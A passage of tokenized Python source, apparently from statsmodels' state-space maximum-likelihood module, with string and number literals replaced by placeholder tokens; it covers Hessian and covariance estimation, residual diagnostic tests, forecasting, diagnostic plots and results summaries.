'<STR_LIT>' ) <EOL> approx_complex_step = kwargs . pop ( '<STR_LIT>' , None ) <EOL> approx_centered = kwargs . pop ( '<STR_LIT>' , False ) <EOL> if not transformed and approx_complex_step : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if approx_complex_step is None : <EOL> approx_complex_step = not self . ssm . _complex_endog <EOL> if approx_complex_step and self . ssm . _complex_endog : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if method == '<STR_LIT>' : <EOL> hessian = self . _hessian_oim ( <EOL> params , transformed = transformed , <EOL> approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered , ** kwargs ) <EOL> elif method == '<STR_LIT>' : <EOL> hessian = self . 
_hessian_opg ( <EOL> params , transformed = transformed , <EOL> approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered , ** kwargs ) <EOL> elif method == '<STR_LIT>' and approx_complex_step : <EOL> return self . _hessian_complex_step ( <EOL> params , transformed = transformed , ** kwargs ) <EOL> elif method == '<STR_LIT>' : <EOL> return self . _hessian_finite_difference ( <EOL> params , transformed = transformed , <EOL> approx_centered = approx_centered , ** kwargs ) <EOL> else : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> return hessian <EOL> def _hessian_oim ( self , params , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return - self . observed_information_matrix ( params , ** kwargs ) <EOL> def _hessian_opg ( self , params , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return - self . opg_information_matrix ( params , ** kwargs ) <EOL> def _hessian_finite_difference ( self , params , approx_centered = False , <EOL> ** kwargs ) : <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> warnings . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if not approx_centered : <EOL> epsilon = _get_epsilon ( params , <NUM_LIT:3> , None , len ( params ) ) <EOL> else : <EOL> epsilon = _get_epsilon ( params , <NUM_LIT:4> , None , len ( params ) ) / <NUM_LIT:2> <EOL> hessian = approx_fprime ( params , self . _score_finite_difference , <EOL> epsilon = epsilon , kwargs = kwargs , centered = approx_centered ) <EOL> return hessian / ( self . nobs - self . ssm . loglikelihood_burn ) <EOL> def _hessian_complex_step ( self , params , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> epsilon = _get_epsilon ( params , <NUM_LIT> , None , len ( params ) ) <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> hessian = approx_hess_cs ( <EOL> params , self . loglike , epsilon = epsilon , kwargs = kwargs ) <EOL> return hessian / ( self . nobs - self . ssm . 
loglikelihood_burn ) <EOL> @ property <EOL> def start_params ( self ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> return self . _start_params <EOL> else : <EOL> raise NotImplementedError <EOL> @ property <EOL> def param_names ( self ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> return self . _param_names <EOL> else : <EOL> try : <EOL> names = [ '<STR_LIT>' % i for i in range ( len ( self . start_params ) ) ] <EOL> except NotImplementedError : <EOL> names = [ ] <EOL> return names <EOL> def transform_jacobian ( self , unconstrained , approx_centered = False ) : <EOL> """<STR_LIT>""" <EOL> return approx_fprime ( unconstrained , self . transform_params , <EOL> centered = approx_centered ) <EOL> def transform_params ( self , unconstrained ) : <EOL> """<STR_LIT>""" <EOL> return np . array ( unconstrained , ndmin = <NUM_LIT:1> ) <EOL> def untransform_params ( self , constrained ) : <EOL> """<STR_LIT>""" <EOL> return np . array ( constrained , ndmin = <NUM_LIT:1> ) <EOL> def update ( self , params , transformed = True , complex_step = False ) : <EOL> """<STR_LIT>""" <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> if not transformed : <EOL> params = self . transform_params ( params ) <EOL> return params <EOL> def simulate ( self , params , nsimulations , measurement_shocks = None , <EOL> state_shocks = None , initial_state = None ) : <EOL> """<STR_LIT>""" <EOL> self . update ( params ) <EOL> simulated_obs , simulated_states = self . ssm . simulate ( <EOL> nsimulations , measurement_shocks , state_shocks , initial_state ) <EOL> if simulated_obs . shape [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> simulated_obs = simulated_obs [ <NUM_LIT:0> , : ] <EOL> else : <EOL> simulated_obs = simulated_obs . 
T <EOL> return simulated_obs <EOL> def impulse_responses ( self , params , steps = <NUM_LIT:1> , impulse = <NUM_LIT:0> , <EOL> orthogonalized = False , cumulative = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . update ( params ) <EOL> return self . ssm . impulse_responses ( <EOL> steps , impulse , orthogonalized , cumulative , ** kwargs ) <EOL> @ classmethod <EOL> def from_formula ( cls , formula , data , subset = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> class MLEResults ( tsbase . TimeSeriesModelResults ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , model , params , results , cov_type = '<STR_LIT>' , <EOL> cov_kwds = None , ** kwargs ) : <EOL> self . data = model . data <EOL> tsbase . TimeSeriesModelResults . __init__ ( self , model , params , <EOL> normalized_cov_params = None , <EOL> scale = <NUM_LIT:1.> ) <EOL> self . filter_results = results <EOL> if isinstance ( results , SmootherResults ) : <EOL> self . smoother_results = results <EOL> else : <EOL> self . smoother_results = None <EOL> self . nobs = model . nobs <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . cov_kwds = { } <EOL> self . cov_type = cov_type <EOL> self . _cache = resettable_cache ( ) <EOL> if cov_kwds is None : <EOL> cov_kwds = { } <EOL> self . _cov_approx_complex_step = ( <EOL> cov_kwds . pop ( '<STR_LIT>' , True ) ) <EOL> self . _cov_approx_centered = cov_kwds . pop ( '<STR_LIT>' , False ) <EOL> try : <EOL> self . _rank = None <EOL> self . _get_robustcov_results ( cov_type = cov_type , use_self = True , <EOL> ** cov_kwds ) <EOL> except np . linalg . LinAlgError : <EOL> self . _rank = <NUM_LIT:0> <EOL> k_params = len ( self . params ) <EOL> self . cov_params_default = np . zeros ( ( k_params , k_params ) ) * np . nan <EOL> self . 
cov_kwds [ '<STR_LIT>' ] = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> for name in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] : <EOL> setattr ( self , name , getattr ( self . filter_results , name , None ) ) <EOL> def _get_robustcov_results ( self , cov_type = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> import statsmodels . stats . sandwich_covariance as sw <EOL> use_self = kwargs . pop ( '<STR_LIT>' , False ) <EOL> if use_self : <EOL> res = self <EOL> else : <EOL> raise NotImplementedError <EOL> res = self . __class__ ( <EOL> self . model , self . params , <EOL> normalized_cov_params = self . normalized_cov_params , <EOL> scale = self . scale ) <EOL> res . cov_type = cov_type <EOL> res . cov_kwds = { } <EOL> approx_complex_step = self . _cov_approx_complex_step <EOL> if approx_complex_step : <EOL> approx_type_str = '<STR_LIT>' <EOL> elif self . _cov_approx_centered : <EOL> approx_type_str = '<STR_LIT>' <EOL> else : <EOL> approx_type_str = '<STR_LIT>' <EOL> k_params = len ( self . params ) <EOL> if k_params == <NUM_LIT:0> : <EOL> res . cov_params_default = np . zeros ( ( <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> res . _rank = <NUM_LIT:0> <EOL> res . cov_kwds [ '<STR_LIT:description>' ] = ( <EOL> '<STR_LIT>' ) <EOL> elif cov_type == '<STR_LIT:none>' : <EOL> res . cov_params_default = np . zeros ( ( k_params , k_params ) ) * np . nan <EOL> res . _rank = np . nan <EOL> res . cov_kwds [ '<STR_LIT:description>' ] = ( <EOL> '<STR_LIT>' ) <EOL> elif self . cov_type == '<STR_LIT>' : <EOL> res . cov_params_default = res . cov_params_approx <EOL> res . cov_kwds [ '<STR_LIT:description>' ] = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % approx_type_str ) <EOL> elif self . cov_type == '<STR_LIT>' : <EOL> res . cov_params_default = res . cov_params_oim <EOL> res . 
cov_kwds [ '<STR_LIT:description>' ] = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % approx_type_str ) <EOL> elif self . cov_type == '<STR_LIT>' : <EOL> res . cov_params_default = res . cov_params_opg <EOL> res . cov_kwds [ '<STR_LIT:description>' ] = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % approx_type_str <EOL> ) <EOL> elif self . cov_type == '<STR_LIT>' or self . cov_type == '<STR_LIT>' : <EOL> res . cov_params_default = res . cov_params_robust_oim <EOL> res . cov_kwds [ '<STR_LIT:description>' ] = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % approx_type_str ) <EOL> elif self . cov_type == '<STR_LIT>' : <EOL> res . cov_params_default = res . cov_params_robust <EOL> res . cov_kwds [ '<STR_LIT:description>' ] = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % approx_type_str ) <EOL> else : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> return res <EOL> @ cache_readonly <EOL> def aic ( self ) : <EOL> """<STR_LIT>""" <EOL> return aic ( self . llf , self . nobs , self . params . shape [ <NUM_LIT:0> ] ) <EOL> @ cache_readonly <EOL> def bic ( self ) : <EOL> """<STR_LIT>""" <EOL> return bic ( self . llf , self . nobs , self . params . shape [ <NUM_LIT:0> ] ) <EOL> def _cov_params_approx ( self , approx_complex_step = True , <EOL> approx_centered = False ) : <EOL> nobs = ( self . model . nobs - self . filter_results . loglikelihood_burn ) <EOL> if approx_complex_step : <EOL> evaluated_hessian = self . model . _hessian_complex_step ( <EOL> self . params , transformed = True <EOL> ) <EOL> else : <EOL> evaluated_hessian = self . model . _hessian_finite_difference ( <EOL> self . params , transformed = True , <EOL> approx_centered = approx_centered <EOL> ) <EOL> self . model . update ( self . params ) <EOL> neg_cov , singular_values = pinv_extended ( nobs * evaluated_hessian ) <EOL> if self . _rank is None : <EOL> self . _rank = np . linalg . matrix_rank ( np . 
diag ( singular_values ) ) <EOL> return - neg_cov <EOL> @ cache_readonly <EOL> def cov_params_approx ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _cov_params_approx ( self . _cov_approx_complex_step , <EOL> self . _cov_approx_centered ) <EOL> def _cov_params_oim ( self , approx_complex_step = True , <EOL> approx_centered = False ) : <EOL> nobs = ( self . model . nobs - self . filter_results . loglikelihood_burn ) <EOL> cov_params , singular_values = pinv_extended ( <EOL> nobs * self . model . observed_information_matrix ( <EOL> self . params , transformed = True , <EOL> approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered ) <EOL> ) <EOL> self . model . update ( self . params ) <EOL> if self . _rank is None : <EOL> self . _rank = np . linalg . matrix_rank ( np . diag ( singular_values ) ) <EOL> return cov_params <EOL> @ cache_readonly <EOL> def cov_params_oim ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _cov_params_oim ( self . _cov_approx_complex_step , <EOL> self . _cov_approx_centered ) <EOL> def _cov_params_opg ( self , approx_complex_step = True , <EOL> approx_centered = False ) : <EOL> nobs = ( self . model . nobs - self . filter_results . loglikelihood_burn ) <EOL> cov_params , singular_values = pinv_extended ( <EOL> nobs * self . model . opg_information_matrix ( <EOL> self . params , transformed = True , <EOL> approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered ) <EOL> ) <EOL> self . model . update ( self . params ) <EOL> if self . _rank is None : <EOL> self . _rank = np . linalg . matrix_rank ( np . diag ( singular_values ) ) <EOL> return cov_params <EOL> @ cache_readonly <EOL> def cov_params_opg ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _cov_params_opg ( self . _cov_approx_complex_step , <EOL> self . _cov_approx_centered ) <EOL> @ cache_readonly <EOL> def cov_params_robust ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . 
cov_params_robust_oim <EOL> def _cov_params_robust_oim ( self , approx_complex_step = True , <EOL> approx_centered = False ) : <EOL> nobs = ( self . model . nobs - self . filter_results . loglikelihood_burn ) <EOL> cov_opg = self . _cov_params_opg ( approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered ) <EOL> evaluated_hessian = ( <EOL> nobs * self . model . observed_information_matrix ( <EOL> self . params , transformed = True , <EOL> approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered ) <EOL> ) <EOL> self . model . update ( self . params ) <EOL> cov_params , singular_values = pinv_extended ( <EOL> np . dot ( np . dot ( evaluated_hessian , cov_opg ) , evaluated_hessian ) <EOL> ) <EOL> if self . _rank is None : <EOL> self . _rank = np . linalg . matrix_rank ( np . diag ( singular_values ) ) <EOL> return cov_params <EOL> @ cache_readonly <EOL> def cov_params_robust_oim ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _cov_params_robust_oim ( self . _cov_approx_complex_step , <EOL> self . _cov_approx_centered ) <EOL> def _cov_params_robust_approx ( self , approx_complex_step = True , <EOL> approx_centered = False ) : <EOL> nobs = ( self . model . nobs - self . filter_results . loglikelihood_burn ) <EOL> cov_opg = self . _cov_params_opg ( approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered ) <EOL> if approx_complex_step : <EOL> evaluated_hessian = nobs * self . model . _hessian_complex_step ( <EOL> self . params , transformed = True <EOL> ) <EOL> else : <EOL> evaluated_hessian = nobs * self . model . _hessian_finite_difference ( <EOL> self . params , transformed = True , <EOL> approx_centered = approx_centered <EOL> ) <EOL> self . model . update ( self . params ) <EOL> cov_params , singular_values = pinv_extended ( <EOL> np . dot ( np . dot ( evaluated_hessian , cov_opg ) , evaluated_hessian ) <EOL> ) <EOL> if self . _rank is None : <EOL> self . _rank = np . linalg . 
matrix_rank ( np . diag ( singular_values ) ) <EOL> return cov_params <EOL> @ cache_readonly <EOL> def cov_params_robust_approx ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _cov_params_robust_approx ( self . _cov_approx_complex_step , <EOL> self . _cov_approx_centered ) <EOL> @ cache_readonly <EOL> def fittedvalues ( self ) : <EOL> """<STR_LIT>""" <EOL> fittedvalues = self . filter_results . forecasts <EOL> if fittedvalues . shape [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> fittedvalues = fittedvalues [ <NUM_LIT:0> , : ] <EOL> else : <EOL> fittedvalues = fittedvalues . T <EOL> return fittedvalues <EOL> @ cache_readonly <EOL> def hqic ( self ) : <EOL> """<STR_LIT>""" <EOL> return hqic ( self . llf , self . nobs , self . params . shape [ <NUM_LIT:0> ] ) <EOL> @ cache_readonly <EOL> def llf_obs ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . model . loglikeobs ( self . params ) <EOL> @ cache_readonly <EOL> def llf ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . llf_obs [ self . filter_results . loglikelihood_burn : ] . sum ( ) <EOL> @ cache_readonly <EOL> def loglikelihood_burn ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . filter_results . loglikelihood_burn <EOL> @ cache_readonly <EOL> def pvalues ( self ) : <EOL> """<STR_LIT>""" <EOL> return norm . sf ( np . abs ( self . zvalues ) ) * <NUM_LIT:2> <EOL> @ cache_readonly <EOL> def resid ( self ) : <EOL> """<STR_LIT>""" <EOL> resid = self . filter_results . forecasts_error <EOL> if resid . shape [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> resid = resid [ <NUM_LIT:0> , : ] <EOL> else : <EOL> resid = resid . T <EOL> return resid <EOL> @ cache_readonly <EOL> def zvalues ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . params / self . bse <EOL> def test_normality ( self , method ) : <EOL> """<STR_LIT>""" <EOL> if method is None : <EOL> method = '<STR_LIT>' <EOL> if method == '<STR_LIT>' : <EOL> from statsmodels . stats . stattools import jarque_bera <EOL> d = self . 
loglikelihood_burn <EOL> output = [ ] <EOL> for i in range ( self . model . k_endog ) : <EOL> resid = self . filter_results . standardized_forecasts_error [ i , d : ] <EOL> mask = ~ np . isnan ( resid ) <EOL> output . append ( jarque_bera ( resid [ mask ] ) ) <EOL> else : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> return np . array ( output ) <EOL> def test_heteroskedasticity ( self , method , alternative = '<STR_LIT>' , <EOL> use_f = True ) : <EOL> r"""<STR_LIT>""" <EOL> if method is None : <EOL> method = '<STR_LIT>' <EOL> if method == '<STR_LIT>' : <EOL> squared_resid = self . filter_results . standardized_forecasts_error ** <NUM_LIT:2> <EOL> d = self . loglikelihood_burn <EOL> test_statistics = [ ] <EOL> p_values = [ ] <EOL> for i in range ( self . model . k_endog ) : <EOL> h = int ( np . round ( ( self . nobs - d ) / <NUM_LIT:3> ) ) <EOL> numer_resid = squared_resid [ i , - h : ] <EOL> numer_resid = numer_resid [ ~ np . isnan ( numer_resid ) ] <EOL> numer_dof = len ( numer_resid ) <EOL> denom_resid = squared_resid [ i , d : d + h ] <EOL> denom_resid = denom_resid [ ~ np . isnan ( denom_resid ) ] <EOL> denom_dof = len ( denom_resid ) <EOL> if numer_dof < <NUM_LIT:2> : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if denom_dof < <NUM_LIT:2> : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> test_statistic = np . sum ( numer_resid ) / np . sum ( denom_resid ) <EOL> if use_f : <EOL> from scipy . stats import f <EOL> pval_lower = lambda test_statistics : f . cdf ( <EOL> test_statistics , numer_dof , denom_dof ) <EOL> pval_upper = lambda test_statistics : f . sf ( <EOL> test_statistics , numer_dof , denom_dof ) <EOL> else : <EOL> from scipy . stats import chi2 <EOL> pval_lower = lambda test_statistics : chi2 . cdf ( <EOL> numer_dof * test_statistics , denom_dof ) <EOL> pval_upper = lambda test_statistics : chi2 . 
sf ( <EOL> numer_dof * test_statistics , denom_dof ) <EOL> alternative = alternative . lower ( ) <EOL> if alternative in [ '<STR_LIT:i>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> p_value = pval_upper ( test_statistic ) <EOL> elif alternative in [ '<STR_LIT:d>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> test_statistic = <NUM_LIT:1.> / test_statistic <EOL> p_value = pval_upper ( test_statistic ) <EOL> elif alternative in [ '<STR_LIT:2>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> p_value = <NUM_LIT:2> * np . minimum ( <EOL> pval_lower ( test_statistic ) , <EOL> pval_upper ( test_statistic ) <EOL> ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> test_statistics . append ( test_statistic ) <EOL> p_values . append ( p_value ) <EOL> output = np . c_ [ test_statistics , p_values ] <EOL> else : <EOL> raise NotImplementedError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return output <EOL> def test_serial_correlation ( self , method , lags = None ) : <EOL> """<STR_LIT>""" <EOL> if method is None : <EOL> method = '<STR_LIT>' <EOL> if method == '<STR_LIT>' or method == '<STR_LIT>' : <EOL> from statsmodels . stats . diagnostic import acorr_ljungbox <EOL> d = self . loglikelihood_burn <EOL> output = [ ] <EOL> if lags is None : <EOL> lags = min ( <NUM_LIT> , self . nobs - d - <NUM_LIT:1> ) <EOL> for i in range ( self . model . k_endog ) : <EOL> results = acorr_ljungbox ( <EOL> self . filter_results . standardized_forecasts_error [ i ] [ d : ] , <EOL> lags = lags , boxpierce = ( method == '<STR_LIT>' ) ) <EOL> if method == '<STR_LIT>' : <EOL> output . append ( results [ <NUM_LIT:0> : <NUM_LIT:2> ] ) <EOL> else : <EOL> output . append ( results [ <NUM_LIT:2> : ] ) <EOL> output = np . c_ [ output ] <EOL> else : <EOL> raise NotImplementedError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return output <EOL> def get_prediction ( self , start = None , end = None , dynamic = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if start is None : <EOL> start = <NUM_LIT:0> <EOL> start = self . model . 
_get_predict_start ( start ) <EOL> end , out_of_sample = self . model . _get_predict_end ( end ) <EOL> dates = self . data . dates <EOL> if isinstance ( dynamic , str ) : <EOL> if dates is None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> dtdynamic = self . model . _str_to_date ( dynamic ) <EOL> try : <EOL> dynamic_start = self . model . _get_dates_loc ( dates , dtdynamic ) <EOL> dynamic = dynamic_start - start <EOL> except KeyError : <EOL> raise ValueError ( "<STR_LIT>" % <EOL> ( str ( dynamic ) , str ( dtdynamic ) ) ) <EOL> prediction_results = self . filter_results . predict ( <EOL> start , end + out_of_sample + <NUM_LIT:1> , dynamic , ** kwargs <EOL> ) <EOL> if self . data . dates is None : <EOL> row_labels = self . data . row_labels <EOL> else : <EOL> row_labels = self . data . predict_dates <EOL> return PredictionResultsWrapper ( <EOL> PredictionResults ( self , prediction_results , row_labels = row_labels ) ) <EOL> def get_forecast ( self , steps = <NUM_LIT:1> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( steps , int ) : <EOL> end = self . nobs + steps - <NUM_LIT:1> <EOL> else : <EOL> end = steps <EOL> return self . get_prediction ( start = self . nobs , end = end , ** kwargs ) <EOL> def predict ( self , start = None , end = None , dynamic = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> prediction_results = self . get_prediction ( start , end , dynamic , ** kwargs ) <EOL> return prediction_results . predicted_mean <EOL> def forecast ( self , steps = <NUM_LIT:1> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( steps , int ) : <EOL> end = self . nobs + steps - <NUM_LIT:1> <EOL> else : <EOL> end = steps <EOL> return self . predict ( start = self . nobs , end = end , ** kwargs ) <EOL> def simulate ( self , nsimulations , measurement_shocks = None , <EOL> state_shocks = None , initial_state = None ) : <EOL> """<STR_LIT>""" <EOL> return self . model . simulate ( self . 
params , nsimulations , <EOL> measurement_shocks , state_shocks , <EOL> initial_state ) <EOL> def impulse_responses ( self , steps = <NUM_LIT:1> , impulse = <NUM_LIT:0> , orthogonalized = False , <EOL> cumulative = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . model . impulse_responses ( self . params , steps , impulse , <EOL> orthogonalized , cumulative , <EOL> ** kwargs ) <EOL> def plot_diagnostics ( self , variable = <NUM_LIT:0> , lags = <NUM_LIT:10> , fig = None , figsize = None ) : <EOL> """<STR_LIT>""" <EOL> from statsmodels . graphics . utils import _import_mpl , create_mpl_fig <EOL> _import_mpl ( ) <EOL> fig = create_mpl_fig ( fig , figsize ) <EOL> d = self . loglikelihood_burn <EOL> resid = self . filter_results . standardized_forecasts_error [ variable , d : ] <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> if hasattr ( self . data , '<STR_LIT>' ) and self . data . dates is not None : <EOL> x = self . data . dates [ self . loglikelihood_burn : ] . _mpl_repr ( ) <EOL> else : <EOL> x = np . arange ( len ( resid ) ) <EOL> ax . plot ( x , resid ) <EOL> ax . hlines ( <NUM_LIT:0> , x [ <NUM_LIT:0> ] , x [ - <NUM_LIT:1> ] , alpha = <NUM_LIT:0.5> ) <EOL> ax . set_xlim ( x [ <NUM_LIT:0> ] , x [ - <NUM_LIT:1> ] ) <EOL> ax . set_title ( '<STR_LIT>' ) <EOL> resid_nonmissing = resid [ ~ ( np . isnan ( resid ) ) ] <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> ax . hist ( resid_nonmissing , normed = True , label = '<STR_LIT>' ) <EOL> from scipy . stats import gaussian_kde , norm <EOL> kde = gaussian_kde ( resid_nonmissing ) <EOL> xlim = ( - <NUM_LIT> * <NUM_LIT:2> , <NUM_LIT> * <NUM_LIT:2> ) <EOL> x = np . linspace ( xlim [ <NUM_LIT:0> ] , xlim [ <NUM_LIT:1> ] ) <EOL> ax . plot ( x , kde ( x ) , label = '<STR_LIT>' ) <EOL> ax . plot ( x , norm . pdf ( x ) , label = '<STR_LIT>' ) <EOL> ax . set_xlim ( xlim ) <EOL> ax . legend ( ) <EOL> ax . set_title ( '<STR_LIT>' ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> from statsmodels . graphics . 
gofplots import qqplot <EOL> qqplot ( resid , line = '<STR_LIT:s>' , ax = ax ) <EOL> ax . set_title ( '<STR_LIT>' ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> from statsmodels . graphics . tsaplots import plot_acf <EOL> plot_acf ( resid , ax = ax , lags = lags ) <EOL> ax . set_title ( '<STR_LIT>' ) <EOL> ax . set_ylim ( - <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> return fig <EOL> def summary ( self , alpha = <NUM_LIT> , start = None , title = None , model_name = None , <EOL> display_params = True ) : <EOL> """<STR_LIT>""" <EOL> from statsmodels . iolib . summary import Summary <EOL> model = self . model <EOL> if title is None : <EOL> title = '<STR_LIT>' <EOL> if start is None : <EOL> start = <NUM_LIT:0> <EOL> if self . data . dates is not None : <EOL> dates = self . data . dates <EOL> d = dates [ start ] <EOL> sample = [ '<STR_LIT>' % ( d . month , d . day , d . year ) ] <EOL> d = dates [ - <NUM_LIT:1> ] <EOL> sample += [ '<STR_LIT>' + '<STR_LIT>' % ( d . month , d . day , d . year ) ] <EOL> else : <EOL> sample = [ str ( start ) , '<STR_LIT>' + str ( self . model . nobs ) ] <EOL> if model_name is None : <EOL> model_name = model . __class__ . __name__ <EOL> het = self . test_heteroskedasticity ( method = '<STR_LIT>' ) <EOL> lb = self . test_serial_correlation ( method = '<STR_LIT>' ) <EOL> jb = self . test_normality ( method = '<STR_LIT>' ) <EOL> if not isinstance ( model_name , list ) : <EOL> model_name = [ model_name ] <EOL> top_left = [ ( '<STR_LIT>' , None ) ] <EOL> top_left . append ( ( '<STR_LIT>' , [ model_name [ <NUM_LIT:0> ] ] ) ) <EOL> for i in range ( <NUM_LIT:1> , len ( model_name ) ) : <EOL> top_left . append ( ( '<STR_LIT>' , [ '<STR_LIT>' + model_name [ i ] ] ) ) <EOL> top_left += [ <EOL> ( '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , [ sample [ <NUM_LIT:0> ] ] ) , <EOL> ( '<STR_LIT>' , [ sample [ <NUM_LIT:1> ] ] ) <EOL> ] <EOL> top_right = [ <EOL> ( '<STR_LIT>' , [ self . model . 
nobs ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . llf ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . aic ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . bic ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . hqic ] ) <EOL> ] <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> top_left . append ( ( '<STR_LIT>' , [ self . cov_type ] ) ) <EOL> format_str = lambda array : [ <EOL> '<STR_LIT:U+002CU+0020>' . join ( [ '<STR_LIT>' . format ( i ) for i in array ] ) <EOL> ] <EOL> diagn_left = [ ( '<STR_LIT>' , format_str ( lb [ : , <NUM_LIT:0> , - <NUM_LIT:1> ] ) ) , <EOL> ( '<STR_LIT>' , format_str ( lb [ : , <NUM_LIT:1> , - <NUM_LIT:1> ] ) ) , <EOL> ( '<STR_LIT>' , format_str ( het [ : , <NUM_LIT:0> ] ) ) , <EOL> ( '<STR_LIT>' , format_str ( het [ : , <NUM_LIT:1> ] ) ) <EOL> ] <EOL> diagn_right = [ ( '<STR_LIT>' , format_str ( jb [ : , <NUM_LIT:0> ] ) ) , <EOL> ( '<STR_LIT>' , format_str ( jb [ : , <NUM_LIT:1> ] ) ) , <EOL> ( '<STR_LIT>' , format_str ( jb [ : , <NUM_LIT:2> ] ) ) , <EOL> ( '<STR_LIT>' , format_str ( jb [ : , <NUM_LIT:3> ] ) ) <EOL> ] <EOL> summary = Summary ( ) <EOL> summary . add_table_2cols ( self , gleft = top_left , gright = top_right , <EOL> title = title ) <EOL> if len ( self . params ) > <NUM_LIT:0> and display_params : <EOL> summary . add_table_params ( self , alpha = alpha , <EOL> xname = self . data . param_names , use_t = False ) <EOL> summary . add_table_2cols ( self , gleft = diagn_left , gright = diagn_right , <EOL> title = "<STR_LIT>" ) <EOL> etext = [ ] <EOL> if hasattr ( self , '<STR_LIT>' ) and '<STR_LIT:description>' in self . cov_kwds : <EOL> etext . append ( self . cov_kwds [ '<STR_LIT:description>' ] ) <EOL> if self . _rank < len ( self . params ) : <EOL> etext . append ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % np . linalg . cond ( self . cov_params ( ) ) ) <EOL> if etext : <EOL> etext = [ "<STR_LIT>" . format ( i + <NUM_LIT:1> , text ) <EOL> for i , text in enumerate ( etext ) ] <EOL> etext . 
